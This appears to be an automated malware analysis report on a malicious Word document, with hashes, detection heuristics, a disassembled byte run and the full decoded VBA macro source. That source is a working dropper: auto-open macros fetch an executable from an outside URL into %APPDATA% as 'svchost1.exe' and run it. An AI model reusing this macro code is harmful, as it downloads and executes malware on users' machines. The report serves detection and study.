Office (OLE) malware analysis — malicious · 19a28ecb2a7fb350

MALICIOUS

Office (OLE)

53.0 KB Created: 2014-01-03 08:15:00 Authoring application: Microsoft Office Word First seen: 2015-09-14

MD5: 001a3679e162d8815c3bd001c18d89c0 SHA-1: 899c9f642c80dbf3cc405377d965673aebd29f16 SHA-256: 19a28ecb2a7fb350f58f3609af714e68317210f6f8d885465a6005aa6ab82d15

294 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File: User Execution T1105 Ingress Tool Transfer

The sample is a Word document containing VBA macros. The document body displays a warning to enable content, a common lure. The Auto_Open macro, named 'Truniazo', uses the URLDownloadToFile API to download a file from 'http://www.maritime.com.pk/images/muta/mwq.exe' to '%APPDATA%\svchost1.exe' and then executes it using the Shell function. This indicates a downloader or dropper functionality.

Heuristics 12

Reference to URLDownloadToFile API critical SC_STR_URLDOWNLOAD

Reference to URLDownloadToFile API
VBA macros detected medium 6 related findings OLE_VBA_MACROS

Document contains VBA macro code
Potential Shell call in VBA critical OLE_VBA_SHELL

Potential Shell call in VBA
Matched line in script
```
Shell Environ("APPDATA") & "\svchost1.exe"
```
URLDownloadToFile in VBA critical OLE_VBA_DOWNLOAD

URLDownloadToFile in VBA
Matched line in script
```
                Alias "URLDownloadToFileA" (ByVal pCaller As Long, _
```
AutoOpen macro low OLE_VBA_AUTOOPEN

AutoOpen macro
Matched line in script
```
Sub AutoOpen()
```
Workbook_Open macro low OLE_VBA_WBOPEN

Workbook_Open macro
Matched line in script
```
Sub Workbook_Open()
```
Auto_Open macro low OLE_VBA_AUTO

Auto_Open macro
Matched line in script
```
Sub Auto_Open()
```
Environ() call (env variable access) low OLE_VBA_ENVIRON

Environ() call (env variable access)
Matched line in script
```
Mcfee 0, "http://www.maritime.com.pk/images/muta/mwq.exe", Environ("APPDATA") & "\svchost1.exe", 0, 0
```

NOP-equivalent sled detected medium SC_NOP_EQUIV_SLED

Long run of 0x40 bytes

Disassembly

Attempted x86 opcode disassembly

0000319C  40                inc eax
0000319D  40                inc eax
0000319E  40                inc eax
0000319F  40                inc eax
000031A0  40                inc eax
000031A1  40                inc eax
000031A2  40                inc eax
000031A3  40                inc eax
000031A4  40                inc eax
000031A5  40                inc eax
000031A6  40                inc eax
000031A7  40                inc eax
000031A8  40                inc eax
000031A9  40                inc eax
000031AA  40                inc eax
000031AB  40                inc eax
000031AC  40                inc eax
000031AD  40                inc eax
000031AE  40                inc eax
000031AF  40                inc eax
000031B0  40                inc eax
000031B1  40                inc eax
000031B2  40                inc eax
000031B3  40                inc eax
000031B4  40                inc eax
000031B5  40                inc eax
000031B6  40                inc eax
000031B7  40                inc eax
000031B8  40                inc eax
000031B9  40                inc eax
000031BA  40                inc eax
000031BB  40                inc eax
000031BC  40                inc eax
000031BD  40                inc eax
000031BE  40                inc eax
000031BF  40                inc eax
000031C0  40                inc eax
000031C1  40                inc eax
000031C2  40                inc eax
000031C3  40                inc eax
000031C4  40                inc eax
000031C5  40                inc eax
000031C6  40                inc eax
000031C7  40                inc eax
000031C8  40                inc eax
000031C9  40                inc eax
000031CA  40                inc eax
000031CB  40                inc eax
000031CC  40                inc eax
000031CD  40                inc eax
000031CE  40                inc eax
000031CF  40                inc eax
000031D0  40                inc eax
000031D1  40                inc eax
000031D2  40                inc eax
000031D3  40                inc eax
000031D4  40                inc eax
000031D5  40                inc eax
000031D6  40                inc eax
000031D7  40                inc eax
000031D8  40                inc eax
000031D9  40                inc eax
000031DA  40                inc eax
000031DB  40                inc eax
000031DC  40                inc eax
000031DD  40                inc eax
000031DE  40                inc eax
000031DF  40                inc eax
000031E0  40                inc eax
000031E1  40                inc eax
000031E2  40                inc eax
000031E3  40                inc eax
000031E4  40                inc eax
000031E5  40                inc eax
000031E6  40                inc eax
000031E7  40                inc eax
000031E8  40                inc eax
000031E9  40                inc eax
000031EA  40                inc eax
000031EB  40                inc eax
000031EC  40                inc eax
000031ED  40                inc eax
000031EE  40                inc eax
000031EF  41                inc ecx
000031F0  ff                .byte 0xff
000031F1  d9a40300004400    fldenv [ebx + eax + 0x440000]
000031F8  640000            add byte ptr fs:[eax], al
000031FB  00                .byte 0x00

Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Macro/content-enable lure medium SE_ENABLE_LURE

Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://www.maritime.com.pk/images/muta/mwq.exe� Referenced by macro
- http://www.maritime.com.pk/images/muta/mwq.exeReferenced by macro
- https://encrypted-tbn2.gstatic.com/images?q=tbn:ANd9GcTj77vuSLZrzjm2Umvs9pEBOWlvXY67JTDOIAxlNBD1VyyQ8GzrReferenced by macro
- http://schemas.openxmlformats.org/drawingml/2006/mainReferenced by macro
- http://schemas.openxmlformats.org/officeDocument/2006/bibliographyReferenced by macro
- http://schemas.openxmlformats.org/officeDocument/2006/customXmlReferenced by macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 1650 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	1650 bytes
SHA-256: `50127b58368a7062d40acddd4b8109f3830bc9b06bdb29d9fdb6e140958933ff`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "Avira" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Declare Function Mcfee _ Lib "urlmon" _ Alias "URLDownloadToFileA" (ByVal pCaller As Long, _ ByVal szURL As String, _ ByVal szFileName As String, _ ByVal dwReserved As Long, _ ByVal lpfnCB As Long) As Long Sub Auto_Open() Truniazo End Sub Sub AutoOpen() Auto_Open End Sub Sub Workbook_Open() Auto_Open End Sub Sub R2y234yu324huh4321h234324lhlh234() mAG ASDA End Sub Sub Rubsadasddsds31321321ete() SDHUSDFH MAD End Sub Sub Rubengandiiiiiise3() Hola ASD End Sub Sub R2y2qweewqewqweqewq34yu324huh4321h234324lhlh234() mAG ASDA End Sub Sub Rubwqeqqweewq31321321ete() SDHUSDFH MAD End Sub Sub Rubewwnse3() Hola ASD End Sub Sub Truniazo() On Error Resume Next Mcfee 0, "http://www.maritime.com.pk/images/muta/mwq.exe", Environ("APPDATA") & "\svchost1.exe", 0, 0 Shell Environ("APPDATA") & "\svchost1.exe" End Sub Attribute VB_Name = "Módulo1" Attribute VB_Name = "Módulo2" Sub Rub33ete() SDHUSDFH MAD End Sub Sub R21321ete() SDHUSDFH MAD End Sub Sub Rub323() SDHUSDFH MAD End Sub Sub Rub31321321ete() SDHUSDFH MAD End Sub Sub Rubae() SDHUSDFH MAD End Sub

SHA-256: 50127b58368a7062d40acddd4b8109f3830bc9b06bdb29d9fdb6e140958933ff

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "Avira"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Declare Function Mcfee _
                Lib "urlmon" _
                Alias "URLDownloadToFileA" (ByVal pCaller As Long, _
                                            ByVal szURL As String, _
                                            ByVal szFileName As String, _
                                            ByVal dwReserved As Long, _
                                            ByVal lpfnCB As Long) As Long

Sub Auto_Open()
    Truniazo
End Sub



Sub AutoOpen()
    Auto_Open
End Sub
Sub Workbook_Open()
    Auto_Open
End Sub

Sub R2y234yu324huh4321h234324lhlh234()
 mAG ASDA
End Sub

Sub Rubsadasddsds31321321ete()
 SDHUSDFH MAD
End Sub

Sub Rubengandiiiiiise3()
 Hola ASD
End Sub

Sub R2y2qweewqewqweqewq34yu324huh4321h234324lhlh234()
 mAG ASDA
End Sub

Sub Rubwqeqqweewq31321321ete()
 SDHUSDFH MAD
End Sub

Sub Rubewwnse3()
 Hola ASD
End Sub
Sub Truniazo()
On Error Resume Next

Mcfee 0, "http://www.maritime.com.pk/images/muta/mwq.exe", Environ("APPDATA") & "\svchost1.exe", 0, 0
Shell Environ("APPDATA") & "\svchost1.exe"

End Sub

Attribute VB_Name = "Módulo1"

Attribute VB_Name = "Módulo2"
Sub Rub33ete()
 SDHUSDFH MAD
End Sub
Sub R21321ete()
 SDHUSDFH MAD
End Sub
Sub Rub323()
 SDHUSDFH MAD
End Sub
Sub Rub31321321ete()
 SDHUSDFH MAD
End Sub
Sub Rubae()
 SDHUSDFH MAD
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.